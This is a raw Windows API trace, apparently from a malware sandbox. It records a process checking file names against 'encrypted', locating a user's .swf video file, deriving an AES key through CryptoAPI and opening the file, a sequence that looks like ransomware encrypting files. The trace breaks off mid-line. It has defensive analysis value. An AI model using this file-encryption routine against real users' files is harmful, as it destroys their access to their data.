[0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="l93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="93 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3 b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oOAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OAw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Aw\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ou4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nOp2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Op2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hd11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="11P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="P9km.swf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0043.648] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0043.648] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0043.648] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0043.648] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.648] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="swf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0043.649] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".swf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0043.649] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.649] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.649] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.649] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0043.649] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.649] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf402ab30, ftCreationTime.dwHighDateTime=0x1d5b99c, ftLastAccessTime.dwLowDateTime=0xc154a40, ftLastAccessTime.dwHighDateTime=0x1d5ba8b, ftLastWriteTime.dwLowDateTime=0xc154a40, ftLastWriteTime.dwHighDateTime=0x1d5ba8b, nFileSizeHigh=0x0, nFileSizeLow=0x1667d, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Ou4nOp2hd11P9km.swf", cAlternateFileName="OU4NOP~1.SWF")) returned 0x7c2100 [0043.649] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0043.649] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.649] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.649] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0043.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.649] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0043.649] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.650] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0043.650] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.650] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.650] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.650] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.650] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.650] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0043.650] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.650] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0043.651] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.651] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.651] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0043.651] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.651] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.651] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.651] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.651] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.651] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.651] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.651] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0043.651] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0043.651] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.651] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.651] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.651] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0043.652] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.652] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.652] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.652] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.652] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.652] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.652] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.652] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.652] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.652] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.652] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.652] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.652] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.652] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.652] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.652] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.652] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.652] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.652] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.652] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0043.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.653] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0043.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.653] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.653] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0043.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.653] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.653] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.653] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.653] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0043.653] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.653] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.653] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0043.654] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.654] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.654] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.654] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.654] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.654] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.654] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0043.654] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.654] CryptDestroyHash (hHash=0x7c2240) returned 1 [0043.654] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.654] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.654] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.654] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.654] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.654] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\oOAw\\Ou4nOp2hd11P9km.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\ooaw\\ou4nop2hd11p9km.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.654] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0043.654] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0043.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0043.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0043.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0043.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.655] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0043.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0043.655] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.655] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0043.655] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.655] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0043.656] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0043.656] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.656] RtlAllocateHeap 